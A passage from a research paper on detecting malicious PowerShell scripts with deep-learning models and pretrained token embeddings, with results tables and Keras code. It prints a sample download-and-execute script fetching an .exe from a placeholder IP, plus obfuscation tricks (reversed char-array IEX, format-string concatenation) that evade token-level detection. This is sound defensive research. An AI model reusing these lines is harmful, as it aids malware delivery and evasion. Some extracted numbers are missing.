Token-Char 0.991 0.997 0.928 0.775
CNN-FastText 0.987 0.939 0.916 0.769
CNN-W2V 0.994 0.976 0.944 0.779
CNN 0.994 0.999 0.943 0.711
CNN-RNN-FastText 0.991 0.937 0.921 0.818
CNN-RNN-W2V 0.994 0.962 0.929 0.805
CNN-RNN 0.991 0.997 0.930 0.736
CHAR-CNN 0.993 0.958 0.936 0.799
Char-3-gram 0.993 0.893 0.867 0.667
Token-2-gram 0.994 0.894 0.898 0.643
TABLE II: Area under the ROC curve (AUC) and TPR per model, FPR

. Standard deviations are less than 0.005 on the validation set, 0.01 on the train set, 0.03 on the train set and 0.003 for the AUC

While all classifiers achieve relatively high TPR values, the performance of the traditional NLP detectors is substantially lower than that of the DL detectors. In comparison to the NLP detectors, the DL detectors improve TPR by up to 4 pp on the validation set and by up to 23 pp on the test set.

The decrease in detectors’ performance on the test set in comparison with the validation set is expected, since the train set (which includes the validation set) and the test set were collected over disjoint periods of time. Moreover, as we described in Section III-B, we deduplicated our labeled data, so that the test set contains only scripts that were not seen in the train set. This implies that our TPR results are, in fact, a lower bound on the actual TPR. This is because, in practice, many scripts that are observed in the training data are likely to also appear in new data to which the detectors are applied. Since TPR results on the training data are very high, these duplicated scripts are very likely to be classified correctly. However, because of de-duplication, such scripts do not appear in our test set. A second possible explanation to the lower performance on the test set is that the models were overfitted to the validation set during the process of hyper-parameters tuning and DL architecture selection.

Focusing on the DL models, it is noteworthy to observe the impact of the pretrained embedding layer. First, inspecting the results on the train set, the TPR of models without the pretrained embedding is above 0.99 (these are the entries in red font in the ”Train” column). These extremely high TPR values are a strong indication of overfitting. Indeed, the overfitting of models without pretrained embeddings is evident from their lower performance on the test set.

For instance, focusing on the results of the Token-Char architecture, let us compare the results of the Token-Char and the Token-Char-FastText models. On the train set, Token-Char overfits with TPR of while Token-Char-FastText obtains a TPR of . On the validation set, Token-Char-FastText’s TPR very slightly outperforms that of Token-Char. The absence of overfitting gained by using the pretrained embedding is established by the results on the test set, where Token-Char-FastText’s TPR improves over that of Token-Char by almost 12 pp, from 0.775 to 0.894 (see the red-font entry at the top of the ”Test” column in Table II). Similar results (although with smaller gaps) can be observed in the CNN-RNN architecture, where the TPR on the test set improves from 0.736 to 0.818, and in the CNN architecture, where it improves from 0.711 to 0.769. A possible explanation for these results is that a pre-trained embedding enables the model to leverage contextual relationships that are absent from the labeled dataset, thus becoming less susceptible to overfitting.

Next, we compare the results obtained when using the two types of embedding – FastText and W2V. We start our comparison with the models of the Token-Char architecture, where the differences in performance between the two embedding algorithms on the test set are more significant. On the train set, the TPR of the W2V model exceeds that of FastText by approx. 2.3 pp. As we’ve already observed, superior performance on the train set is often a sign of higher overfitting and this seems to be the case also here. Indeed, FastText takes the lead on the validation set and outperforms W2V by approx. 0.7 pp. The gap becomes much more significant on the test set, where Token-Char-FastText is the best model with a TPR of more than 0.89, exceeding the TPR of Token-Char-W2V by almost 8.5 pp.

A similar trend, although much less pronounced, is observed on the CNN and the CNN-RNN architectures. W2V’s TP is superior to that of FastText on the train set (by 3.7 pp and 2.5 pp, respectively), but the gaps are slightly decreased on the validation set (2.8 pp and 0.8 pp, respectively) and significantly decreased or even reversed on the test set (1 pp and -1.3 pp, respectively).

Collectively, these results seem to indicate that, in our setting, models employing FastText are better at generalizing as compared with those based on W2V. A possible explanation is that FastText is better in interpreting tokens that were not seen in the train set but appear in the validation or test sets. This is because FastText utlilizes sub-tokens in the embedding process.

Summing up our analysis of TPR results, we reach the following key conclusions:

  1. The DL detection models significantly outperform the traditional NLP models.

  2. Pretrained embedding significantly improved TPR on the test set: by 11.9 pp in the Token-Char architecture, and by 8.2 and 6.8 pp in the CNN-RNN and CNN architectures, respectively.

Another, more general conclusion, is the following: in some cases, it is important to analyze the TPR on the train set and not only on the validation set alone, in order to avoid selecting an overfitted model. As evident from our evaluation, when two models reach more-or-less the same TPR on the validation set, the TPR on the train set can help us determine which model will generalize better on unseen data.

We proceed to analyze in finer resolution the manner in which contextual embedding improves detection performance.

Vi-C The Contribution of Contextual Embeddings

In this section, we analyze the contribution of contextual embedding. We start by measuring the contribution to the model TPR that is gained by using non-labeled data in the contextual embedding. We then describe and analyze specific examples of malicious PowerShell tokens and code whose detection is facilitated by using the embedding.

Vi-C1 Contribution of Non-Labeled Data

In Section VI, we evaluated 12 malicious-PowerShell-script detectors (see Table II), 6 of which use a pretrained embedding layer. As we saw, the pretrained embedding improves TPR significantly on all architectures. We remind the reader that the embedding layer was trained using both the train set and the unlabeled dataset. In order to quantify the contribution of the unlabeled dataset by itself to the TPR of our detection models, we generated an embedding layer using the train set only and then measured the TPR of the resulting models (while keeping the FPR below 0.001).

The results are presented by Table III. The ’Inline’ column presents the TPR for the models without contextual embedding and the ’All data’ column presents it for the models with an embedding trained using both the train set and the unlabeled dataset.161616These values also appear in Table II and are presented here for facilitating comparison.. The ’Train set only’ column presents the TPR results of the new models, trained using the train set only – without the unlabeled scripts. As can be seen by comparing the 2’nd and 3’rd columns of Table III, all the models except for Token-Char-FastText hardly benefit at all from the contextual embedding when it is trained using the train set only. Thus, the contribution of the contextual embedding for these 5 models should be fully attributed to the usage of the unlabeled dataset (whose contribution can be quantified by comparing the 3’rd and 4’th columns). The explanation for this is, most probably, the fact that DL model weights are optimized anyway w.r.t. the train set tokens by the supervised training process.

The results for the Token-Char-FastText detector are significantly different. Training the contextual embedding solely based on the train set improves TPR by approx. 4.8 pp over no contextual embedding at all, while using also scripts from the unlabeled corpus increases TPR by additional 7.1 pp. The contribution of the train set embedding in this case can probably be attributed to the character-level input representation.

Model Inline Train set only All data
Token-Char-FastText 0.775 0.823 0.894
Token-Char-W2v 0.775 0.763 0.810
CNN-FastText 0.711 0.72 0.769
CNN-W2V 0.711 0.713 0.779
CNN-RNN-FastText 0.736 0.736 0.818
CNN-RNN-W2V 0.736 0.729 0.805
TABLE III: TPR results without contextual embedding (’Inline’), with contextual embedding using train set only, and with contextual embedding using both the unlabeled dataset and the train set.

Vi-C2 Detection Examples

We now provide an example of how the W2V embedding facilitates the detection of malicious code. Consider the following short malicious script:

Invoke-WebRequest -Uri http://<Ip>/ry.exe

-OutFile

([System.IO.Path]::GetTempPath()+’c.exe’);

powershell.exe Start-Process -Filepath

([System.IO.Path]::GetTempPath()+’c.exe’);

In the above code, Invoke-WebRequest is used to fetch the payload, write it to a temporary folder and then execute it. Recall that the PowerShell command Invoke-WebRequest has an alias – IWR. When replacing in the above cmdlet Invoke-WebRequest by IWR, the CNN-RNN model using the inline embedding scores the altered script 5 pp lower, that is, it scores it as significantly less likely to be malicious. This decrease does not occur when the CNN-RNN-W2V model is used. We now explain the reason for this difference.

Counting token appearances in the train set, we found that the Invoke-WebRequest command appears in 1540 clean scripts and in 6 malicious scripts, while IWR appears in 27 train set scripts, all of which are clean. This explains the decrease in score of the inline embedding model.

In the model that uses the W2V embedding, on the other hand, the Invoke-WebRequest command and its alias IWR were found to be semantically equivalent, since each of the two vectors to which they were mapped by W2V is the closest neighbor of the other. Consequently, when using the CNN-RNN-W2V model, no decrease in the score is observed when replacing the command by its alias.

Next, we provide an example of how FastText facilitates detection by comparing the performance of the CNN-RNN model (which does not use a contextual embedding) with that of CNN-RNN-FastText. We prefer to conduct this comparison using the CNN-RNN architecture rather than the Token-Char architecture, since the former only utilizes per-token information, making it easier to pinpoint the contribution of the contextual embedding.

The CNN-RNN-FastText model detected 143 scripts that were not detected by the CNN-RNN model. Out of these, 137 are TPs and 6 are FPs.171717On the other hand, 34 scripts detected by CNN-RNN with inline embedding were not detected using FastText embedding. Out of these, 28 are TPs and 6 are FPs. Manually analyzing these scripts, we were not able to identify any specific tokens which could have contributed to the detection. Nevertheless, our analysis of the newly-detected scripts indicates that in at least 41 of these scripts, detection can be, at least partly, attributed to the fact that FastText uses sub-tokens. We now provide an example showcasing the possible contribution of sub-tokens.

Our analysis identified the following 3 tokens (henceforth referred to as the example tokens), one or more of which appearing in 41 of the newly detected scripts: ’responsetext’, ’responsebody’ and ’xmlhttp’. These 4 tokens seem rather benign based on the train set: they were respectively seen in 44, 84 and 49 train set scripts, out of which only (respectively) 1, 2 and 2 were malicious. We then analyzed the properties of their sub-tokens. In addition to a significant increase in the number of train set scripts that contain one or more of these sub-tokens (which is to be expected), we found that some of them seem suspicious based on the train set, as the ratio of malicious train set scripts in which they appear is relatively high, facilitating the detection of the scripts that contain them by the model. Examples of such sub-tokens are:

  • ’http’ appeared in 18,616 train set scripts, 2,024 of which are malicious (10.8%).

  • ’spo’ appeared in 7,296 scripts, 656 of which are malicious (8.9%).

Since FastText utilizes sub-tokens for its embedding process, the vector representations assigned to tokens with similar sub-tokens are relatively close to each other. Consequently, as the above sub-tokens appear in a malicious context (mostly as part of tokens other than the example tokens), the fact that the tokens containing them are embedded to vectors that are relatively close to those of the example tokens can assist the model in correctly classifying scripts containing these example tokens.

Vi-D Character-Level Versus Token-Level Representations

In this section, we investigate the added value of the character-level input representation over the token-level representation and discuss the ways in which we combined the two representations.

From Table II, we see that the TPR of the CHAR-CNN model on the test set not only significantly surpasses that of the NLP-based detectors, but also exceeds that of the CNN architecture models by 2 pp or more. Its TPR is also comparable with that of the CNN-RNN architecture models and, specifically, is exceeded by the CNN-RNN-FastText model by less than 2 pp. We now analyze the differences in detection between the CHAR-CNN and the CNN-RNN-FastText models to better understand the added value of CHAR-CNN.

By comparing the detection results of these two models we found that CNN-RNN-FastText detects 60 scripts that are not detected by CHAR-CNN, 55 of which are TPs, while CHAR-CNN detects 34 scripts (29 of which are TPs) that are not detected by CNN-RNN-FastText. The significant added value of the character-level model can be explained by the existence of obfuscated scripts in our test set that are detected by it but are not detected at the token level, as we explain next.

We focus first on the CNN-RNN-FastText model and discuss how it treats various PowerShell code obfuscation techniques and why some of them are not detected by it, using concrete examples from the 29 test set scripts that are detected by CHAR-CNN but evade CNN-RNN-FastText.

As we described previously, FastText uses sub-tokens to construct a contextual embedding. This enables the model to tackle one of the known methods of PowerShell obfuscation – the use of string manipulations to construct a PowerShell command. Unfortunately, in some cases, the usage of sub-tokens by FastText is insufficient for detecting this type of obfuscation. Moreover, there are additional PowerShell obfuscation techniques that are not detectable at the token level. We identified 3 such “blind spots” of FastText181818These are clearly blind spots of W2V as well, since W2V treats tokens as atomic units.:

  • One popular way of PowerShell code obfuscation, seen in many malicious scripts, is the usage of tokens whose characters alternate between lower-case and upper-case (e.g., iNvOkE-wEbReQuEsT). Token-level representations are unable to detect this type of obfuscation, which was observed in 16 of the 29 scripts that evaded CNN-RNN-FastText.

  • Special characters such as ’+’ and ’[’ or ’]’ are considered as delimiters and are therefore absent from token-level embeddings, that is, they do not appear as part of tokens or sub-tokens. Out of the 29 missed scripts, 13 scripts contain all of these 3 special characters. Interestingly, in three of these scripts, we observed a relatively rare obfuscation technique, in which a part of the script (that contained ASCII-encoded characters) appeared in reverse order. An example of this obfuscation technique is the command "[88]rahc[+96]rahc[+37]rahc", which, upon reversal, becomes "IEX", an alias of the "Invoke-Expression" cmdlet. It is impossible to detect such obfuscation techniques without considering the special characters they use.

  • String manipulations using one or two characters generally evade FastText. The minimum length of a token is 2, hence a single character cannot contribute to a model using the FastText embedding. As for two-character tokens, these are likely to appear in numerous contexts, and so it is reasonable to assume that their embedding does not contribute much to the detection. Indeed, in 12 of the 29 missed scripts, tokens were constructed by concatenating multiple strings, many of which are singleton characters or 2-character strings, thus evading FastText. Here is an example of part of a command obfuscated in this manner:
    ’{2}{3}{0}{1}’-f ’Sc’,’RiPT’,’inVOk’,’E’ ’vA’ + ’rI’+’aBle:jW4v’

Turning our attention back to the CHAR-CNN model, it was established in [14] that it is able to detect many of these obfuscation techniques, since it considers its input at the character-level and takes character casing into consideration.

In the wake of the above analysis, we concluded that the character-level and the token-level approaches are complementary and seem to cover different aspects of the detection problem, hence sought ways of combining them. Our first attempt to combine the two approaches was to construct an ensemble that combines the detection results of CNN-RNN-FastText and CHAR-CNN by using the average of the scores they assign to the input script.

The ensemble increased the TPR on the test set to 0.835, which translates to at least 45 additional script detections in comparison to each of the two models by itself. Still, this is almost 6 pp lower than the TPR of the Token-Char-FastText model (which achieves a TPR of 0.894 on the test set). These results indicate that feeding the DL model with both a token-level and a character-level input representation enables it to learn features based on combinations of signals from both levels, providing more synergy between them than is possible by using each model separately and feeding their scores to an ensemble.

Vii Related work

Several recent reports by anti-malware vendors surveyed the increasing use of PowerShell as a cybersecurity attack vector [3, 2, 4]. Hendler et al. [14] presented the first detector of malicious PowerShell code. Their detector is based on a DL model that uses a character-level representation. Whereas their detector is optimized for detecting PowerShell commands, our detector targets the detection of malicious PowerShell scripts and modules, whose syntax is much more complex. Holmes and Bohannon [47] present a detector of obfuscated PowerShell code. Although the problem of detecting obfuscated scripts is related to that of detecting malicious scripts, these are two different problems, because many malicious scripts are not obfuscated and these scripts cannot be detected using the approach of [47]. Moreover, benign PowerShell scripts may be obfuscated as well.

Recently, Rusak et al. [48] presented a classifier of malicious PowerShell scripts into malware families. Their classifier is based on an Abstract Syntax Tree (AST) representation of PowerShell scripts. Their DL model uses a small-scale embedding of 62 types of AST node types. They report on accuracy of 85% on their validation set. Unlike our work, they do not address the problem of detection malicious PowerShell code, nor do they use a (direct) contextual embedding of PowerShell code.

In the following, we survey additional previous works that present DL-based detectors, often in conjunction with an embedding stage, for detecting malicious scripts, PE files and URLs. Unlike our work, none of them uses unlabeled data to pre-train an embedding layer. Moreover, whereas our (best-performing) detector combines embeddings of both language-level tokens and characters, these works only use an embedding at a single representation level, mostly the character/byte level.

Raff et al. [49] addressed the problem of detecting malicious Portable Executable (PE) files using a DL model containing an embedding layer. Their classifier uses the PE header only, whose raw bytes are used as input to a DL model, containing a W2V-style embedding layer. According to their evaluation, their detector obtained similar results to those of using one-hot encoding, which can be expected given the fact that their embedding is conducted on character-level input. Athiwaratkun and Stokes [50] addressed the same problem using dynamic analysis of PE files, emulating file execution and recording the sequence of system-calls executed by the program. This generated a set of 114 unique high-level system-calls. These sequences were used as input to several DL models, one of which included an embedding layer which treated each system-call in the sequence as a token.

Saxe and Berlin [51] use a character-level embedding in conjuction with a CNN architecture for detecting malicious URLs, file paths and registry values. They use several filter sizes in order to mimic -gram features. In recent work, Yang et al. [52] propose a DL-based approach for detecting malicious URLs. In their work, they use a character-level embedding but also explicitly consider specific 95 suspicious tokens for fine-tuning this embedding.

Stokes et al. [53] present a DL-based detector of malicious JavaScript and VisualBasicScript code. They use the byte representation of the script as model input. They experimented with two architectures, one using a byte-level embedding, which is more effective for analyzing relatively-short code sequences, and another that processes the input in longer units of fixed length before feeding it to the embedding layer. In both cases, the embedding was learnt as part of the supervised training. Wang et al. [54] present a malicious JavaScript code detector. Their detector converts JavaScript code to binary vectors (according to character ASCII values), which are then being input to the DL architecture, but does not use an embedding technique.

In the rest of this section, we briefly describe two novel contextual word embedding schemes with which we didn’t experiment. Devlin et al. present BERT, applying the bidirectional training of Transformer [55] to language modeling. They present and use a novel masked language model technique for conducting bidirectional training. Unlike FastText and W2V, BERT uses multiple hidden layers.

Peters et al. present ELMo [56], an embedding technique that constructs several vector representations for each token, one per every context in which it appears. For instance, the word ’pool’ has different meanings in the context of ’swimming pool’ and ’playing pool’. ELMo uses two bidirectional LSTM layers on top of a character-level convolution layer.

In this work, we chose to use W2V and FastText in order to investigate the contribution of using pretrained embedding for the detection of malicious PowerShell scripts. We preferred these algorithms over BERT given the relatively-small dataset, and over ELMo, since it is optimized for settings in which many tokens have different meanings in different contexts, which is not the case in the PowerShell “language”.

Viii Conclusions and Future Work

In this work, we addressed the problem of detecting malicious PowerShell scripts. We presented and evaluated several novel DL-based detectors that leverage a pre-trained contextual embedding of tokens from the PowerShell “language”. A unique feature of these detectors is that their embedding is trained using a dataset enriched by a large corpus of unlabeled PowerShell scripts. Our performance analysis establishes that the usage of unlabeled data significantly increased detection accuracy. A promising avenue for future work is to investigate whether this technique can find additional cybersecurity applications. As a first step, we plan to implement, using this approach, detectors for additional scripting languages. Another related interesting question is how best to strike a balance between the sizes of the unlabeled dataset used for embedding and the labeled dataset used for supervised training.

Our best model combines an embedding of language-level tokens with one-hot encoding of characters. Feeding the DL model with both a token-level and a character-level input representation enables it to learn features based on combinations of signals from both levels, thereby obtaining a TPR of nearly 90% while maintaining a low FPR of less than 0.1%, making us hopeful that this model can be of practical value.

In future work, we plan to investigate alternative ways of combining features based on both token-level and character-level input representations.

References

Ix Appendix - implementation details

We implemented our DL models using Keras191919https://keras.io/

. For the DL models, we used binary cross-entropy as a loss function, with Adam optimizer, and a tolerance of

. Data was processed in mini-batches of size 512 with a maximum of 30 epochs. Weights of samples were proportional to classes ratio.

As for traditional ML, SGD with log loss and L2 as penalty were used. We stopped after 100 iterations, or if the change in loss was smaller than .

Ix-a Cnn

On top of the Embedding layer we used a convolutional layer with 128 filters and a kernel size of 3 (meaning that we processed each time 3 tokens). A global Max-pooling layer was used, reducing dimensionality, followed by a Dropout layer and Dense layer with a Sigmoid activation function.
model = Sequential()
model.add(Embedding(32))
model.add(Conv1D(128,
      kernel-size= 3,

      padding=’valid’,


      activation=’relu’,


      strides=1))
model.add(GlobalMaxPooling1D())
model.add(Dropout(0.5))
model.add(Dense(1, activation=’sigmoid’))

Ix-B Cnn-Rnn

We used an LSTM layer on top of a convolutional layer. The convolutional layer had 128 filters and a kernel size of 3 (meaning that we processed each time 3 tokens). A max-pooling layer was used with a pool and stride size of 3, reducing dimensionality, followed by a bi-directional LSTM layer with output of size 32, and a Dense layer with a Sigmoid activation function as our output
model = Sequential()
model.add(Embedding(32))
model.add(Conv1D(128,
      kernel-size= 3,
      padding=’valid’,
      activation=’relu’,
      strides=1))
model.add(MaxPooling1D(pool_size=3, strides=3 ))
model.add(Bidirectional(LSTM(32, dropout=0.5, recurrent_dropout=0.02)))
model.add(Dense(1, activation=’sigmoid’))

Ix-C Token-Char

We used an LSTM layer on top of a concatenation of the output of two convolutional layers – one on top of the token level input and another from the character level input. Note that in the character level case, we use a global max pooling layer on top of the convolution layer, resulting in a single 64 long tensor. In order to concatenate it with the output of the max pooling performed on the token level convolutional layer, we need to first duplicate this tensor to have the same length as the latter. In both cases, the convolutional layer has 64 filters and a kernel size of 3 (meaning that we processed each time 3 tokens/characters). For the token level input, a max-pooling layer is used with a pool and stride size of 3. After the concatenation, we use a bi-directional LSTM layer with output of size 32, and a Dense layer with a Sigmoid activation function as our output.
#TOKEN
token_input = Input(shape=(1000,),
                    dtype=’float’)
token_embedding = GetEmbeddingLayer()                   (token_input)
token_conv = Conv1D(64, kernel_size=3,              strides=1, padding=’valid’,
             activation=’relu’)
                  (token_embedding)
token_pool = MaxPooling1D(pool_size=3,              strides=3)(token_conv)
token_drop =Dropout(.5)(token_pool)

#CHAR
char_input = Input(shape=(1000,),
                    dtype=’float’)
char_encoding = OneHotWithCaseBit(max_len)                   (char_input)

char_conv = Conv1D(64, kernel_size=3,              strides=1, padding=’valid’,
             activation=’relu’)
                  (char_embedding)
char_pool = GlobalMaxPooling1D()(char_conv)
char_drop = Dropout(.5)(char_pool)
char_repeated = RepeatVector
      (token_drop.get_shape() [1].value)
                  (char_drop)


#Merge
merged = concatenate

      ([token_drop, char_repeated])
lstm = Bidirectional(LSTM(32,    dropout=0.3, recurrent_dropout=0.01))
                  (merged)
output = Dense(1, activation="sigmoid")                   (lstm)

Ix-D Tokens Embedding

We used Gensim202020https://radimrehurek.com/gensim/ to build the embedding. Both W2V and FastText were used, with CBOW as the training algorithm. Parameters used are:

  • Min length of a word was two, max was 50.

  • We ignored all words with total frequency lower than ten.

  • Our embedding space size is 32.

  • The window size used was 4 (window is the maximum distance between the current and predicted word within a sentence).

  • We performed negative sampling with five noise words.

  • We performed 25 iterations.